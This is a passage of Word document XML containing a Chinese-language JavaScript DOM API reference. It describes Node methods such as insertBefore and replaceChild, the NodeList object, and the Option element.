      <w:r>
        <w:t>节点时，它的所有属性也会复制。不过要注意，注册在节点上的事件监听函数不会复制。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short compareDocum</w:t>
      </w:r>
      <w:r>
        <w:t>entPosition(Node other)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法比较当前节点与指定的</w:t>
      </w:r>
      <w:r>
        <w:t>other</w:t>
      </w:r>
      <w:r>
        <w:t>节点在文档中的位置，并返回一个数字，这个数字的置位（</w:t>
      </w:r>
      <w:r>
        <w:t>set bit</w:t>
      </w:r>
      <w:r>
        <w:t>）情况描述了两个节点的关系。如果两个节点相同，将没有位置位，这个方法返回</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>否则，返回值的一个或多个位将置位。上面列出的</w:t>
      </w:r>
      <w:r>
        <w:t>DOCUMENT_POSITION_</w:t>
      </w:r>
      <w:r>
        <w:t>常量给出了每一位的符号名，各项含义如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251783168" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="4127739" cy="1630392"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="127" name="00127.jpeg" descr="00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7.jpeg" descr="00127.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId130"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4127739" cy="1630392"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean hasChildNodes()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前节点有一个或多个子节点则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；如果不包含节点则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node insertBef</w:t>
      </w:r>
      <w:r>
        <w:t>ore(Node newChild,Node refChild)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法将节点</w:t>
      </w:r>
      <w:r>
        <w:t>newChild</w:t>
      </w:r>
      <w:r>
        <w:t>作为当前节点的子节点插入到文档树中，并返回这个插入的节点。新节点将添加到当前节点的</w:t>
      </w:r>
      <w:r>
        <w:t>childNodes[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组中，以便它立即出现在</w:t>
      </w:r>
      <w:r>
        <w:t>refChild</w:t>
      </w:r>
      <w:r>
        <w:t>节点前面。如果</w:t>
      </w:r>
      <w:r>
        <w:t>refChild</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>newChild</w:t>
      </w:r>
      <w:r>
        <w:t>将插入到</w:t>
      </w:r>
      <w:r>
        <w:t>childNodes[]</w:t>
      </w:r>
      <w:r>
        <w:t>的结尾，和</w:t>
      </w:r>
      <w:r>
        <w:t>appendChild()</w:t>
      </w:r>
      <w:r>
        <w:t>方法一样。注意，不能通过不是当前节点的子节点的</w:t>
      </w:r>
      <w:r>
        <w:t>refChild</w:t>
      </w:r>
      <w:r>
        <w:t>调用这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>newChild</w:t>
      </w:r>
      <w:r>
        <w:t>已经在文档树中了，它将先从文档树中移除，再重新</w:t>
      </w:r>
      <w:r>
        <w:t>插入到新的位置。如果</w:t>
      </w:r>
      <w:r>
        <w:t>newChild</w:t>
      </w:r>
      <w:r>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>节点，插入的将不是这个节点本身，而是它的所有子节点将按顺序插入到指定的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>boolean isDefaultNamespace(string namespace)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果指定的</w:t>
      </w:r>
      <w:r>
        <w:t>namespace URL</w:t>
      </w:r>
      <w:r>
        <w:t>和由</w:t>
      </w:r>
      <w:r>
        <w:t>lookupNamespaceURI(null)</w:t>
      </w:r>
      <w:r>
        <w:t>返回的默认命名空间</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>一样，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean isEqualNode(Node other)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前节点和</w:t>
      </w:r>
      <w:r>
        <w:t>other</w:t>
      </w:r>
      <w:r>
        <w:t>节点完全相同则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，包括相同的类型、标签名、属性以及（递归的）子节点。如果两个节点不相同则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean isSameNode(Node other)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前节点和</w:t>
      </w:r>
      <w:r>
        <w:t>other</w:t>
      </w:r>
      <w:r>
        <w:t>节点是同一个节点则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。也可以简单地使用</w:t>
      </w:r>
      <w:r>
        <w:t>“==”</w:t>
      </w:r>
      <w:r>
        <w:t>操作符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string lookupNamespaceURI(string prefx)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法返回与指定命名空间</w:t>
      </w:r>
      <w:r>
        <w:t>prefix</w:t>
      </w:r>
      <w:r>
        <w:t>关联的命名空间</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，如果不存在则返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:t>prefx</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，则返回默认命名空间的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string lookupP</w:t>
      </w:r>
      <w:r>
        <w:t>refx(string namespace)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个方法返回与指定</w:t>
      </w:r>
      <w:r>
        <w:t>namespace URL</w:t>
      </w:r>
      <w:r>
        <w:t>关联的命名空间前缀，如果不存在则返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void normalize()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法通过合并相邻节点以及移除空节点的方式，让当前节点的文本子孙节点标准化。文档一般不会有空的或相邻的文本节点，但在脚本添加或移除节点时这种情况有可能出现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node removeChild(Node oldChild)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法从当前节点的</w:t>
      </w:r>
      <w:r>
        <w:t>childNodes[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组中移除</w:t>
      </w:r>
      <w:r>
        <w:t>oldChild</w:t>
      </w:r>
      <w:r>
        <w:t>。如果在一个节点上调用这个方法，但传入的节点不是它的子节点将会出错。</w:t>
      </w:r>
      <w:r>
        <w:t>removeChild()</w:t>
      </w:r>
      <w:r>
        <w:t>在移除</w:t>
      </w:r>
      <w:r>
        <w:t>oldChild</w:t>
      </w:r>
      <w:r>
        <w:t>节点后将返回这个节点。</w:t>
      </w:r>
      <w:r>
        <w:t>oldChild</w:t>
      </w:r>
      <w:r>
        <w:t>仍然是一个有效的节点，可以在稍后重新插入到文档中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node replaceChild(Node newChild,Node oldChild)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法使用</w:t>
      </w:r>
      <w:r>
        <w:t>newChild</w:t>
      </w:r>
      <w:r>
        <w:t>替换</w:t>
      </w:r>
      <w:r>
        <w:t>oldChild</w:t>
      </w:r>
      <w:r>
        <w:t>，并返回</w:t>
      </w:r>
      <w:r>
        <w:t>oldChild</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>oldChild</w:t>
      </w:r>
      <w:r>
        <w:t>必须是当前节点的一个子节点。如果</w:t>
      </w:r>
      <w:r>
        <w:t>newChild</w:t>
      </w:r>
      <w:r>
        <w:t>已经是当前文档的一部分，它将先从文档中移除，再重新插入到新的位置。如果</w:t>
      </w:r>
      <w:r>
        <w:t>newChild</w:t>
      </w:r>
      <w:r>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:t>DocumentFragment</w:t>
      </w:r>
      <w:r>
        <w:t>，插入的将不是这个节点本身，而是它的子节点将按顺序插入到原来由</w:t>
      </w:r>
      <w:r>
        <w:t>oldChild</w:t>
      </w:r>
      <w:r>
        <w:t>占据的位置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="858" w:name="NodeList"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>NodeList</w:t>
      </w:r>
      <w:bookmarkEnd w:id="858"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>组成的只读的类数组对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>是一个只读的类数组对象，其元素为</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>对象（通常为</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>）。它的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
      <w:r>
        <w:t>指明这个列表包含多少节点，可通过索引</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>length-1</w:t>
      </w:r>
      <w:r>
        <w:t>来遍历这些节点。也可以传入期望的索引到</w:t>
      </w:r>
      <w:r>
        <w:t>item()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来代替直接检索</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>的元素总是有效的</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>对象，也就是说，</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>绝对不会包含</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>很常用，例如，</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>childNodes</w:t>
      </w:r>
      <w:r>
        <w:t>属性，</w:t>
      </w:r>
      <w:r>
        <w:t>Document.getElementsByTagName()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Element.getElementsByTagName()</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLDocument.getElementsByName()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的返回值</w:t>
      </w:r>
      <w:r>
        <w:t>都是</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>是类数组对象，但是，我们经常非正式地将它们当做数组来引用，用到的语句类似</w:t>
      </w:r>
      <w:r>
        <w:t>“childNodes[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>需要注意，</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>对象通常是实时的：它们不是静态快照，而会实时反映出文档树的改变。例如，如果有一个代表指定节点的子节点的</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>，然后删除其中一个子节点，则该子节点也会从</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>中移除。在遍历一个</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>的元素时要小心：循环体中的代码可能会改变文档树（比如删除节点），这可能会影响到</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>的内容！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly u</w:t>
      </w:r>
      <w:r>
        <w:t>nsigned long length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前</w:t>
      </w:r>
      <w:r>
        <w:t>NodeList</w:t>
      </w:r>
      <w:r>
        <w:t>中的节点的数目。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Node item(unsigned long index)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回指定</w:t>
      </w:r>
      <w:r>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:t>位置的</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>，如果索引超出范围则返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="859" w:name="Option"/>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:bookmarkEnd w:id="859"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>元素中的＜</w:t>
      </w:r>
      <w:r>
        <w:t>option</w:t>
      </w:r>
      <w:r>
        <w:t>＞</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Option</w:t>
      </w:r>
      <w:r>
        <w:t>对象描述</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>对象中显示的一个选项。这个对象的属性指明它是否默认选中，是否当前处于选中状态，它在容器</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>options[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组中的位置，它显示的文本，以及如果它被选中，提交包含的表单时它传</w:t>
      </w:r>
      <w:r>
        <w:t>给服务器的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由于历史原因，</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素定义了一个构造函数，可以用它来创建及初始化新的</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>元素。（当然，也可以使用普通的</w:t>
      </w:r>
      <w:r>
        <w:t>Document.createElement()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。）一旦创建新的</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>对象，它就可以</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>追加到某个</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>options</w:t>
      </w:r>
      <w:r>
        <w:t>集合中。细节可参见</w:t>
      </w:r>
      <w:r>
        <w:t>HTMLOptionsCollection</w:t>
      </w:r>
      <w:r>
        <w:t>。</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Option([string text,string value,boolean defaultSelected,boolean selected])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Op</w:t>
      </w:r>
      <w:r>
        <w:t>tion()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数可创建一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>option</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个可选参数定义了元素的</w:t>
      </w:r>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:t>（参见</w:t>
      </w:r>
      <w:r>
        <w:t>Node</w:t>
      </w:r>
      <w:r>
        <w:t>）、</w:t>
      </w:r>
      <w:r>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>的初始值、</w:t>
      </w:r>
      <w:r>
        <w:t>defaultSelected</w:t>
      </w:r>
      <w:r>
        <w:t>以及选中</w:t>
      </w:r>
      <w:r>
        <w:t>selected</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean defaultSelected</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个属性对应</w:t>
      </w:r>
      <w:r>
        <w:t>HTML selected</w:t>
      </w:r>
      <w:r>
        <w:t>属性。它定义当前选项的初始选中状态，当表单重置时也会使用这个值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean disabled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前选项禁用则为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:t>Option</w:t>
      </w:r>
      <w:r>
        <w:t>或包含它们的＜</w:t>
      </w:r>
      <w:r>
